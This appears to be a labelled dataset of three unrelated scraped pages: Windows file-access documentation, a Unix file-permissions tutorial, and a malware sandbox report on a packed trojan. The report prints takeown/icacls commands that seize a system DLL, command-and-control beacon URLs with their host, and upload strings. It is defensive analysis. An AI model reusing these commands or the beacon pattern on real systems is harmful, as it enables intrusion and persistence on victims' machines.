SYNCHRONIZE access right for synchronization. The following are the generic access rights for files and directories. Access right Description FILE_GENERIC_EXECUTE FILE_EXECUTE FILE_READ_ATTRIBUTES STANDARD_RIGHTS_EXECUTE SYNCHRONIZE FILE_GENERIC_READ FILE_READ_ATTRIBUTES FILE_READ_DATA FILE_READ_EA STANDARD_RIGHTS_READ SYNCHRONIZE FILE_GENERIC_WRITE FILE_APPEND_DATA FILE_WRITE_ATTRIBUTES FILE_WRITE_DATA FILE_WRITE_EA STANDARD_RIGHTS_WRITE SYNCHRONIZE \xc2 Windows compares the requested access rights and the information in the thread's access token with the information in the file or directory object's security descriptor. If the comparison does not prohibit all of the requested access rights from being granted, a handle to the object is returned to the thread and the access rights are granted. For more information about this process, see Interaction between Threads and Securable Objects. By default, authorization for access to a file or directory is controlled strictly by the ACLs in the security descriptor associated with that file or directory. In particular, the security descriptor of a parent directory is not used to control access to any child file or directory. The FILE_TRAVERSE access right can be enforced by removing the BYPASS_TRAVERSE_CHECKING privilege from users. This is not recommended in the general case, as many programs do not correctly handle directory traversal errors. The primary use for the FILE_TRAVERSE access right on directories is to enable conformance to certain IEEE and ISO POSIX standards when interoperability with Unix systems is a requirement. The Windows security model provides a way for a child directory to inherit, or to be prevented from inheriting, one or more of the ACEs in the parent directory's security descriptor. Each ACE contains information that determines how it can be inherited, and whether it will have an effect on the inheriting directory object. For example, some inherited ACEs control access to the inherited directory object, and these are called effective ACEs. All other ACEs are called inherit-only ACEs. The Windows security model also enforces the automatic inheritance of ACEs to child objects according to the ACE inheritance rules. This automatic inheritance, along with the inheritance information in each ACE, determines how security restrictions are passed down the directory hierarchy. Note that you cannot use an access-denied ACE to deny only GENERIC_READ or only GENERIC_WRITE access to a file. This is because for file objects, the generic mappings for both GENERIC_READ or GENERIC_WRITE include the SYNCHRONIZE access right. If an ACE denies GENERIC_WRITE access to a trustee, and the trustee requests GENERIC_READ access, the request will fail because the request implicitly includes SYNCHRONIZE access which is implicitly denied by the ACE, and vice versa. Instead of using access-denied ACEs, use access-allowed ACEs to explicitly allow the permitted access rights. Another means of managing access to storage objects is encryption. The implementation of file system encryption in Windows is the Encrypted File System, or EFS. EFS encrypts only files and not directories. The advantage of encryption is that it provides additional protection to files that is applied on the media and not through the file system and the standard Windows access control architecture. For more information on file encryption, see File Encryption. In most cases, the ability to read and write the security settings of a file or directory object is restricted to kernel-mode processes. Clearly, you would not want any user process to be able to change the ownership or access restriction on your private file or directory. However, a backup application would not be able to complete its job of backing up your file if the access restrictions you have placed on your file or directory does not allow the application's user-mode process to read it. Backup applications must be able to override the security settings of file and directory objects to ensure a complete backup. Similarly, if a backup application attempts to write a backup copy of your file over the disk-resident copy, and you explicitly deny write privileges to the backup application process, the restore operation cannot complete. In this case also, the backup application must be able to override the access control settings of your file. The SE_BACKUP_NAME and SE_RESTORE_NAME access privileges were specifically created to provide this ability to backup applications. If these privileges have been granted and enabled in the access token of the backup application process, it can then call CreateFile to open your file or directory for backup, specifying the standard READ_CONTROL access right as the value of the dwDesiredAccess parameter. However, to identify the calling process as a backup process, the call to CreateFile must include the FILE_FLAG_BACKUP_SEMANTICS flag in the dwFlagsAndAttributes parameter. The full syntax of the function call is the following: HANDLE hFile = CreateFile( fileName, // lpFileName READ_CONTROL, // dwDesiredAccess 0, // dwShareMode NULL, // lpSecurityAttributes OPEN_EXISTING, // dwCreationDisposition FILE_FLAG_BACKUP_SEMANTICS, // dwFlagsAndAttributes NULL ); // hTemplateFile This will allow the backup application process to open your file and override the standard security checking. To restore your file, the backup application would use the following CreateFile call syntax when opening your file to be written. HANDLE hFile = CreateFile( fileName, // lpFileName WRITE_OWNER | WRITE_DAC, // dwDesiredAccess 0, // dwShareMode NULL, // lpSecurityAttributes CREATE_ALWAYS, // dwCreationDisposition FILE_FLAG_BACKUP_SEMANTICS, // dwFlagsAndAttributes NULL ); // hTemplateFile There are situations when a backup application must be able to change the access control settings of a file or directory. An example is when the access control settings of the disk-resident copy of a file or directory is different from the backup copy. This would happen if these settings were changed after the file or directory was backed up, or if it was corrupted. The FILE_FLAG_BACKUP_SEMANTICS flag specified in the call to CreateFile gives the backup application process permission to read the access-control settings of the file or directory. With this permission, the backup application process can then call GetKernelObjectSecurity and SetKernelObjectSecurity to read and than reset the access-control settings. If a backup application must have access to the system-level access control settings, the ACCESS_SYSTEM_SECURITY flag must be specified in the dwDesiredAccess parameter value passed to CreateFile. Backup applications call BackupRead to read the files and directories specified for the restore operation, and BackupWrite to write them. Related topics Standard Access Rights \xc2 \xc2 Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Unix / Linux - File Permission / Access Modes - Tutorialspoint Home Jobs Tools Coding Ground Current Affairs UPSC Notes Online Tutors Whiteboard Net Meeting Tutorix Categories Academic Tutorials Big Data & Analytics Computer Programming Computer Science Databases DevOps Digital Marketing Engineering Tutorials Exams Syllabus Famous Monuments GATE Exams Tutorials Latest Technologies Machine Learning Mainframe Development Management Tutorials Mathematics Tutorials Microsoft Technologies Misc tutorials Mobile Development Java Technologies Python Technologies SAP Tutorials Programming Scripts Selected Reading Software Quality Soft Skills Telecom Tutorials UPSC IAS Exams Web Development Sports Tutorials XML Technologies Multi-Language Tutorials Interview Questions Library Videos Q/A eBooks Library Videos eBooks Unix / Linux for Beginners Unix / Linux - Home Unix / Linux - Getting Started Unix / Linux - File Management Unix / Linux - Directories Unix / Linux - File Permission Unix / Linux - Environment Unix / Linux - Basic Utilities Unix / Linux - Pipes & Filters Unix / Linux - Processes Unix / Linux - Communication Unix / Linux - The vi Editor Unix / Linux Shell Programming Unix / Linux - Shell Scripting Unix / Linux - What is Shell? Unix / Linux - Using Variables Unix / Linux - Special Variables Unix / Linux - Using Arrays Unix / Linux - Basic Operators Unix / Linux - Decision Making Unix / Linux - Shell Loops Unix / Linux - Loop Control Unix / Linux - Shell Substitutions Unix / Linux - Quoting Mechanisms Unix / Linux - IO Redirections Unix / Linux - Shell Functions Unix / Linux - Manpage Help Advanced Unix / Linux Unix / Linux - Regular Expressions Unix / Linux - File System Basics Unix / Linux - User Administration Unix / Linux - System Performance Unix / Linux - System Logging Unix / Linux - Signals and Traps Unix / Linux Useful Resources Unix / Linux - Questions & Answers Unix / Linux - Useful Commands Unix / Linux - Quick Guide Unix / Linux - Builtin Functions Unix / Linux - System Calls Unix / Linux - Commands List Unix / Linux - Useful Resources Unix / Linux - Discussion Selected Reading UPSC IAS Exams Notes Developer's Best Practices Questions and Answers Effective Resume Writing HR Interview Questions Computer Glossary Who is Who Unix / Linux - File Permission / Access Modes Advertisements Previous Page Next Page \xc2 In this chapter, we will discuss in detail about file permission and access modes in Unix. File ownership is an important component of Unix that provides a secure method for storing files. Every file in Unix has the following attributes \xe2\x88\x92 Owner permissions \xe2\x88\x92 The owner's permissions determine what actions the owner of the file can perform on the file. Group permissions \xe2\x88\x92 The group's permissions determine what actions a user, who is a member of the group that a file belongs to, can perform on the file. Other (world) permissions \xe2\x88\x92 The permissions for others indicate what action all other users can perform on the file. The Permission Indicators While using ls -l command, it displays various information related to file permission as follows \xe2\x88\x92 $ls -l /home/amrood -rwxr-xr-- 1 amrood users 1024 Nov 2 00:10 myfile drwxr-xr--- 1 amrood users 1024 Nov 2 00:10 mydir Here, the first column represents different access modes, i.e., the permission associated with a file or a directory. The permissions are broken into groups of threes, and each position in the group denotes a specific permission, in this order: read (r), write (w), execute (x) \xe2\x88\x92 The first three characters (2-4) represent the permissions for the file's owner. For example, -rwxr-xr-- represents that the owner has read (r), write (w) and execute (x) permission. The second group of three characters (5-7) consists of the permissions for the group to which the file belongs. For example, -rwxr-xr-- represents that the group has read (r) and execute (x) permission, but no write permission. The last group of three characters (8-10) represents the permissions for everyone else. For example, -rwxr-xr-- represents that there is read (r) only permission. File Access Modes The permissions of a file are the first line of defense in the security of a Unix system. The basic building blocks of Unix permissions are the read, write, and execute permissions, which have been described below \xe2\x88\x92 Read Grants the capability to read, i.e., view the contents of the file. Write Grants the capability to modify, or remove the content of the file. Execute User with execute permissions can run a file as a program. Directory Access Modes Directory access modes are listed and organized in the same manner as any other file. There are a few differences that need to be mentioned \xe2\x88\x92 Read Access to a directory means that the user can read the contents. The user can look at the filenames inside the directory. Write Access means that the user can add or delete files from the directory. Execute Executing a directory doesn't really make sense, so think of this as a traverse permission. A user must have execute access to the bin directory in order to execute the ls or the cd command. Changing Permissions To change the file or the directory permissions, you use the chmod (change mode) command. There are two ways to use chmod \xe2\x80\x94 the symbolic mode and the absolute mode. Using chmod in Symbolic Mode The easiest way for a beginner to modify file or directory permissions is to use the symbolic mode. With symbolic permissions you can add, delete, or specify the permission set you want by using the operators in the following table. Sr.No. Chmod operator & Description 1 + Adds the designated permission(s) to a file or directory. 2 - Removes the designated permission(s) from a file or directory. 3 = Sets the designated permission(s). Here's an example using testfile. Running ls -1 on the testfile shows that the file's permissions are as follows \xe2\x88\x92 $ls -l testfile -rwxrwxr-- 1 amrood users 1024 Nov 2 00:10 testfile Then each example chmod command from the preceding table is run on the testfile, followed by ls \xe2\x80\x93l, so you can see the permission changes \xe2\x88\x92 $chmod o+wx testfile $ls -l testfile -rwxrwxrwx 1 amrood users 1024 Nov 2 00:10 testfile $chmod u-x testfile $ls -l testfile -rw-rwxrwx 1 amrood users 1024 Nov 2 00:10 testfile $chmod g = rx testfile $ls -l testfile -rw-r-xrwx 1 amrood users 1024 Nov 2 00:10 testfile Here's how you can combine these commands on a single line \xe2\x88\x92 $chmod o+wx,u-x,g = rx testfile $ls -l testfile -rw-r-xrwx 1 amrood users 1024 Nov 2 00:10 testfile Using chmod with Absolute Permissions The second way to modify permissions with the chmod command is to use a number to specify each set of permissions for the file. Each permission is assigned a value, as the following table shows, and the total of each set of permissions provides a number for that set. Number Octal Permission Representation Ref 0 No permission --- 1 Execute permission --x 2 Write permission -w- 3 Execute and write permission: 1 (execute) + 2 (write) = 3 -wx 4 Read permission r-- 5 Read and execute permission: 4 (read) + 1 (execute) = 5 r-x 6 Read and write permission: 4 (read) + 2 (write) = 6 rw- 7 All permissions: 4 (read) + 2 (write) + 1 (execute) = 7 rwx Here's an example using the testfile. Running ls -1 on the testfile shows that the file's permissions are as follows \xe2\x88\x92 $ls -l testfile -rwxrwxr-- 1 amrood users 1024 Nov 2 00:10 testfile Then each example chmod command from the preceding table is run on the testfile, followed by ls \xe2\x80\x93l, so you can see the permission changes \xe2\x88\x92 $ chmod 755 testfile $ls -l testfile -rwxr-xr-x 1 amrood users 1024 Nov 2 00:10 testfile $chmod 743 testfile $ls -l testfile -rwxr---wx 1 amrood users 1024 Nov 2 00:10 testfile $chmod 043 testfile $ls -l testfile ----r---wx 1 amrood users 1024 Nov 2 00:10 testfile Changing Owners and Groups While creating an account on Unix, it assigns a owner ID and a group ID to each user. All the permissions mentioned above are also assigned based on the Owner and the Groups. Two commands are available to change the owner and the group of files \xe2\x88\x92 chown \xe2\x88\x92 The chown command stands for ""change owner"" and is used to change the owner of a file. chgrp \xe2\x88\x92 The chgrp command stands for ""change group"" and is used to change the group of a file. Changing Ownership The chown command changes the ownership of a file. The basic syntax is as follows \xe2\x88\x92 $ chown user filelist The value of the user can be either the name of a user on the system or the user id (uid) of a user on the system. The following example will help you understand the concept \xe2\x88\x92 $ chown amrood testfile $ Changes the owner of the given file to the user amrood. NOTE \xe2\x88\x92 The super user, root, has the unrestricted capability to change the ownership of any file but normal users can change the ownership of only those files that they own. Changing Group Ownership The chgrp command changes the group ownership of a file. The basic syntax is as follows \xe2\x88\x92 $ chgrp group filelist The value of group can be the name of a group on the system or the group ID (GID) of a group on the system. Following example helps you understand the concept \xe2\x88\x92 $ chgrp special testfile $ Changes the group of the given file to special group. SUID and SGID File Permission Often when a command is executed, it will have to be executed with special privileges in order to accomplish its task. As an example, when you change your password with the passwd command, your new password is stored in the file /etc/shadow. As a regular user, you do not have read or write access to this file for security reasons, but when you change your password, you need to have the write permission to this file. This means that the passwd program has to give you additional permissions so that you can write to the file /etc/shadow. Additional permissions are given to programs via a mechanism known as the Set User ID (SUID) and Set Group ID (SGID) bits. When you execute a program that has the SUID bit enabled, you inherit the permissions of that program's owner. Programs that do not have the SUID bit set are run with the permissions of the user who started the program. This is the case with SGID as well. Normally, programs execute with your group permissions, but instead your group will be changed just for this program to the group owner of the program. The SUID and SGID bits will appear as the letter ""s"" if the permission is available. The SUID ""s"" bit will be located in the permission bits where the owners\xe2\x80\x99 execute permission normally resides. For example, the command \xe2\x88\x92 $ ls -l /usr/bin/passwd -r-sr-xr-x 1 root bin 19031 Feb 7 13:47 /usr/bin/passwd* $ Shows that the SUID bit is set and that the command is owned by the root. A capital letter S in the execute position instead of a lowercase s indicates that the execute bit is not set. If the sticky bit is enabled on the directory, files can only be removed if you are one of the following users \xe2\x88\x92 The owner of the sticky directory The owner of the file being removed The super user, root To set the SUID and SGID bits for any directory try the following command \xe2\x88\x92 $ chmod ug+s dirname $ ls -l drwsr-sr-x 2 root root 4096 Jun 19 06:45 dirname $ Previous Page Print Page Next Page \xc2 Advertisements About us Terms of use Cookies Policy FAQ's Helping Contact \xc2\xa9 Copyright 2019. All Rights Reserved.","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"This website uses cookies to enhance your browsing experience. Please note that by continuing to use this site you consent to the terms of our Data Protection Policy. Toggle navigation Logo malicious Threat Score: 100/100AV Detection: 68%Labeled as: MemScan:Trojan.Generic c9b65b764985dfd7a11d3faf599c56b8 This report is generated from a file or URL submitted to this webservice on June 12th 2018 01:20:26 (CEST) Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1 Report generated by Falcon Sandbox v8.10 \xc2\xa9 Hybrid Analysis Incident Response Risk Assessment Persistence Grants permissions using icacls (DACL modification) Injects into explorer Injects into remote processes Spawns a lot of processes Tries to take ownership of files Writes data to a remote process Network Behavior Contacts 1 domain and 1 host. Indicators Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details. Malicious Indicators17 Environment Awareness The input sample contains a known anti-VM trick External Systems Detected Suricata Alert Found an IP/URL artifact that was identified as malicious by a significant amount of reputation engines Sample was identified as malicious by a large number of Antivirus engines Sample was identified as malicious by at least one Antivirus engine General The analysis extracted a file that was identified as malicious The analysis spawned a process that was identified as malicious Installation/Persistance Allocates virtual memory in a remote process Injects into explorer Injects into remote processes Writes data to a remote process Pattern Matching YARA signature match System Security Modifies the access control lists of files Unusual Characteristics Spawns a lot of processes Hiding 3 Malicious Indicators All indicators are available only in the private webservice or standalone version Suspicious Indicators21 Anti-Detection/Stealthyness Contains ability to open/control a service Queries process information Anti-Reverse Engineering PE file has unusual entropy sections PE file is packed with UPX Cryptographic Related Found a cryptographic related string Environment Awareness Contains ability to query CPU information External Systems Found an IP/URL artifact that was identified as malicious by at least one reputation engine General Contains ability to find and load resources of a specific module Installation/Persistance Contains ability to create a remote thread (often used for process injection) Contains ability to write to a remote process Creates new processes Drops executable files Spyware/Information Retrieval Contains ability to enumerate processes/modules/threads System Destruction Marks file for deletion Opens file with deletion access rights System Security Grants permissions using icacls (DACL modification) Tries to take ownership of files Unusual Characteristics CRC value set in PE header does not match actual value Entrypoint in PE header is within an uncommon section Imports suspicious APIs Hiding 1 Suspicious Indicators All indicators are available only in the private webservice or standalone version Informative30 Anti-Reverse Engineering Contains ability to register a top-level exception handler (often used as anti-debugging trick) PE file contains zero-size sections Environment Awareness Contains ability to query machine time Contains ability to query the machine version Contains ability to query the system locale Makes a code branch decision directly after an API that is environment aware Reads the active computer name Tries to sleep for a long time (more than two minutes) General Contacts domains Contacts server Contains PDB pathways Creates a writable file in a temporary directory Creates mutants GETs files from a webserver Launches a browser Process launched with changed environment Runs shell commands Spawns new processes Tries to GET non-existent files from a webserver Installation/Persistance Connects to LPC ports Dropped files Modifies auto-execute functionality by setting/creating a value in the registry Monitors specific registry key for changes Opens the MountPointManager (often used to detect additional infection locations) Touches files in the Windows directory Network Related Found potential URL in binary/memory HTTP request contains Base64 encoded artifacts Unusual Characteristics Installs hooks/patches the running process Matched Compiler/Packer signature Reads information about supported languages File Details All Details: c9b65b764985dfd7a11d3faf599c56b8 Filename c9b65b764985dfd7a11d3faf599c56b8 Size 305KiB (312320 bytes) Type peexe executable Description PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed Architecture WINDOWS SHA256 ef0d2628823e8e0a0de3b08b8eacaf41cf284c086a948bdfd67f4e4373c14e4dCopy SHA256 to clipboard Compiler/Packer UPX v1.25 (Delphi) Stub Resources Language KOREAN Icon Sample Icon Visualization Input File (PortEx) PE Visualization Classification (TrID) 42.3% (.EXE) UPX compressed Win32 Executable 36.7% (.EXE) Win32 EXE Yoda's Crypter 9.1% (.DLL) Win32 Dynamic Link Library (generic) 6.2% (.EXE) Win32 Executable (generic) 2.7% (.EXE) Generic Win/DOS Executable File Metadata File Compositions Imported Objects File Analysis 1 .OBJ Files (COFF) linked with LINK.EXE 10.10 (Visual Studio 2010) (build: 30319) 1 .RES Files linked with CVTRES.EXE 10.00 (Visual Studio 2010) (build: 30319) 1 .CPP Files (with LTCG) compiled with CL.EXE 16.00 (Visual Studio 2010) (build: 30319) File Sections Details Name UPX0 Entropy 0 Virtual Address 0x1000 Virtual Size 0x22d000 Raw Size 0x0 MD5 d41d8cd98f00b204e9800998ecf8427e Name UPX1 Entropy 7.9309190833 Virtual Address 0x22e000 Virtual Size 0x4c000 Raw Size 0x4ba00 MD5 fafee9506c2cb7606718693156703f67 Name .rsrc Entropy 4.06720567587 Virtual Address 0x27a000 Virtual Size 0x1000 Raw Size 0x600 MD5 80e9f3854461573cdd5ef15498a07fd4 File Imports ADVAPI32.dll KERNEL32.DLL RegCloseKey Screenshots Hybrid Analysis Tip: Click an analysed process below to view more details. Analysed 10 processes in total. c9b65b764985dfd7a11d3faf599c56b8.exe (PID: 2084) 46/66 ~ER1AFA.tmp (PID: 2080) 43/53 explorer.exe (PID: 1468) sysprep.exe ""%WINDIR%\\System32\\sysprep\\sysprep.exe"" "" (PID: 3272) cmd.exe /c takeown /f ""%WINDIR%\\system32\\msimg64.dll"" && icacls ""%WINDIR%\\system32\\msimg64.dll"" /grant administrators:F (PID: 2272) takeown.exe takeown /f ""%WINDIR%\\system32\\msimg64.dll"" (PID: 2396) icacls.exe icacls ""%WINDIR%\\system32\\msimg64.dll"" /grant administrators:F (PID: 2596) iexplore.exe www.google.com (PID: 2096) iexplore.exe SCODEF:2096 CREDAT:79873 (PID: 2672) cmd.exe cmd /c d.bat (PID: 2832) Logged Script Calls Logged Stdout Extracted Streams Memory Dumps Reduced Monitoring Network Activity Network Error Multiscan Match Network Analysis DNS Requests Domain Address Registrar Country solarshade.co.kr 221.143.46.43 TTL: 179 Megazone(http://HOSTING.KR) Name Server: ns1.hosting.co.kr Creation Date: Sat, 14 Jan 2017 00:00:00 GMT Flag of Korea Republic of Korea Republic of Contacted Hosts IP Address Port/Protocol Associated Process Details 221.143.46.43 80 TCP iexplore.exe PID: 2096 Flag of Korea Republic of Korea Republic of Contacted Countries HTTP Traffic Endpoint Request URL Data 221.143.46.43:80 (solarshade.co.kr) GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=3740962&sc=b984cf5bcbf0f38f3d136d1f97103a91 GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=3740962&sc=b984cf5bcbf0f38f3d136d1f97103a91 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: solarshade.co.kr 404 Not Found 221.143.46.43:80 (solarshade.co.kr) GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=5265868&sc=2e03e977aa881c76f7df783789a1e026 GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=5265868&sc=2e03e977aa881c76f7df783789a1e026 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: solarshade.co.kr 404 Not Found 221.143.46.43:80 (solarshade.co.kr) GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=6906788&sc=412dd86c4ba55fde5144cf03627da841 GET /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=6906788&sc=412dd86c4ba55fde5144cf03627da841 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32) Host: solarshade.co.kr 404 Not Found Suricata Alerts Event Category Description SID 221.143.46.43:80 (TCP) Hidden Category Additional ETPro rules are available in the private webservice or standalone version Hidden SID 221.143.46.43:80 (TCP) A Network Trojan was detected CrowdStrike SILENT CHOLLIMA HTTP/IRC Bot/RAT and Concealment Troy GET Request 181303201 221.143.46.43:80 (TCP) Hidden Category Additional ETPro rules are available in the private webservice or standalone version Hidden SID 221.143.46.43:80 (TCP) Hidden Category Additional ETPro rules are available in the private webservice or standalone version Hidden SID 221.143.46.43:80 (TCP) A Network Trojan was detected CrowdStrike SILENT CHOLLIMA HTTP/IRC Bot/RAT and Concealment Troy GET Request 181303201 221.143.46.43:80 (TCP) A Network Trojan was detected CrowdStrike SILENT CHOLLIMA HTTP/IRC Bot/RAT and Concealment Troy GET Request 181303201 ET rules applied using Suricata. Extracted Strings All Details: All Strings (1399) Interesting (357) c9b65b764985dfd7a11d3faf599c56b8.exe.bin (272) ~ER1AFA.tmp:2080 (889) screen_0.png (11) ~ER24B7.tmp.2200803788 (2) cmd.exe (2) PCAP (8) sysprep.exe:3272 (42) setupact.log (7) c9b65b764985dfd7a11d3faf599c56b8.exe:2084 (22) ud.bat (8) ~13785.tmp (9) diagwrn.xml (34) diagerr.xml (3) iexplore.exe:2096 (65) takeown.exe:2396 (6) w7e2219.tmp.362704492 (3) network.pcap (8) ~ER1AFA.tmp.3895635532 (1) icacls.exe (1) explorer.exe:1468 (2) iexplore.exe (2) takeown.exe (1) setuperr.log (1) !""#$%&'()*+,-./0 ""%WINDIR%\\System32\\sysprep\\sysprep.exe"" "" $.6 ~]\\HTTP T.y %d.%d.%d.%d:%d %s ------> %s %s is installed successfully. %s\\cmd.exe /c %s %s\\mscorp.exe %s\\msimg64.dll %sPhysical Address. . . . . . . . . : %sIP Address. . . . . . . . . . . . : %sSubnet Mask . . . . . . . . . . . : %sDefault Gateway . . . . . . . . . : %sDhcp Enabled. . . . . . . . . . . : %d ******************* ""ERROR!"" code: [%d] *************** , msimg64.dll - unexpected heap error - unexpected multithread lock error -----------------------------7d414e351603faContent-Disposition: form-data; name=""no""1-----------------------------7d414e351603faContent-Disposition: form-data; name=""id""%s-----------------------------7d414e351603faContent-Disposition: -----------------------------7d414e351603faContent-Disposition: form-data; name=""no""1-----------------------------7d414e351603faContent-Disposition: form-data; name=""id""%s-----------------------------7d414e351603faContent-Disposition: form-data; name=""sn""%d-----------------------------7d414e351603faContent-Disposition: form-data; name=""sc""%s-----------------------------7d414e351603fa-- -----------------------------7d414e351603faContent-Disposition: form-data; name=""upfile""; filename=""title.gif""Content-Type: application/octet-stream .?AV__non_rtti_object@std@@ .?AVbad_alloc@std@@ .?AVbad_cast@std@@ .?AVbad_exception@std@@ .?AVbad_typeid@std@@ .?AVCRemoteMemory@W7EUtils@@ .?AVCTempResource@W7EUtils@@ .?AVexception@std@@ .?AVlength_error@std@@ .?AVlogic_error@std@@ .?AVout_of_range@std@@ .?AVtype_info@@ .a)0s^U!i! /c takeown /f ""%WINDIR%\\system32\\msimg64.dll"" && icacls ""%WINDIR%\\system32\\msimg64.dll"" /grant administrators:F /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=3740962&sc=b984cf5bcbf0f38f3d136d1f97103a91 /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=5265868&sc=2e03e977aa881c76f7df783789a1e026 /eml/goods_list_ok.php?no=0&id=YH^0A00278A626A[0]&sn=6906788&sc=412dd86c4ba55fde5144cf03627da841 033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. 2- floating point support not loaded 2-9W2&:7:=:l: 2018-06-12 01:21:31, Error [0x0f0053] SYSPRP ValidateUser:User does not have required privileges to sysprep machine[gle=0x00000006] 2018-06-12 01:21:31, Error [0x0f00a1] SYSPRP WinMain: User must be an administrator.[gle=0x00000006] 2018-06-12 01:21:31, Info SYSPRP === Beginning of a new sysprep run === 2018-06-12 01:21:31, Info SYSPRP ======================================================== 2018-06-12 01:21:31, Info [0x0f004d] SYSPRP The time is now 2018-06-12 01:21:31 2018-06-12 01:21:31, Info [0x0f004e] SYSPRP Initialized SysPrep log at %WINDIR%\\System32\\sysprep\\Panther 3- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. 404 Not Found Not Found
The requested URL /eml/goods_list_ok.php was not found on this server.
Apache/2.2.15 (CentOS) Server at solarshade.co.kr Port 80 Apache/2.2.15 (CentOS) Server at solarshade.co.kr Port 80 PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX true true true The requested URL /eml/goods_list_ok.php was not found on this server.
404 Not Found Not Found
The requested URL /eml/goods_list_ok.php was not found on this server.
Apache/2.2.15 (CentOS) Server at solarshade.co.kr Port 80 HTTP/1.1 404 Not FoundDate: Mon, 11 Jun 2018 23:52:07 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 301Connection: closeContent-Type: text/html; charset=iso-8859-1404 Not Found Not Found
The requested URL /eml/goods_list_ok.php was not found on this server.
Apache/2.2.15 (CentOS) Server at solarshade.co.kr Port 80 HTTP/1.1 404 Not FoundDate: Mon, 11 Jun 2018 23:52:28 GMTServer: Apache/2.2.15 (CentOS)Content-Length: 301Connection: closeContent-Type: text/html; charset=iso-8859-1404 Not Found Not Found
The requested URL /eml/goods_list_ok.php was not found on this server.
Apache/2.2.15 (CentOS) Server at solarshade.co.kr Port 80 I will sleep until 20%02d:%d:%d. Bye.. icacls ""%WINDIR%\\system32\\msimg64.dll"" /grant administrators:F IETldDllVersionHigh IETldDllVersionLow IETldVersionHigh IETldVersionLow iexplore.exe if not exist ""C:\\c9b65b764985dfd7a11d3faf599c56b8.exe"" goto done InfoTip InstallDate insufficient lookahead int support not loaded Invalid irc_errno value IsProcessorFeaturePresent IsValidLocale IsWow64Process loating point support not loaded Local LocalizedName LocalRedirectOnly LookupPrivilegeValueA ltithread lock error Microsoft Corporation Certificate Description. Microsoft Visual C++ Runtime Library Mozilla/4.0 (compatible; MSIE 6.0; Win32) mscoree.dll msimg64.dll NG error ntime Error!Program: o.pdbm1V OpenProcess OpenProcessToken OpenServiceA opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u output buffer too small for in-memory compression PidService Display Name======================= portuguese-brazilian Process32First Process32FirstW Process32Next Process32NextW ProtoLocal AddressForeign AddressState qrstuvwxyz[\\]^_`?{|}~ R6002- floating point support not loaded R6017- unexpected multithread lock error R6018- unexpected heap error R6032- not enough space for locale information R6033- Attempt to use MSIL code from this assembly during native code initializationThis indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6034An application has made an attempt to load the C runtime library incorrectly.Please contact the application's support team for more information. rchy Descriptor' RegCloseKey RegCreateKeyExA RegDeleteValueA RegEnumKeyExA RegEnumValueA RegisteredOrganization RegisteredOwner RegOpenKeyExA RegQueryInfoKeyA RegQueryValueExA RegSetValueExA ReleaseMutex RSADecrypt - CryptImportKey RSAEncrypt - CryptImportKey RtlLookupFunctionEntry runtime error Runtime Error!Program: S^""Content-Type: 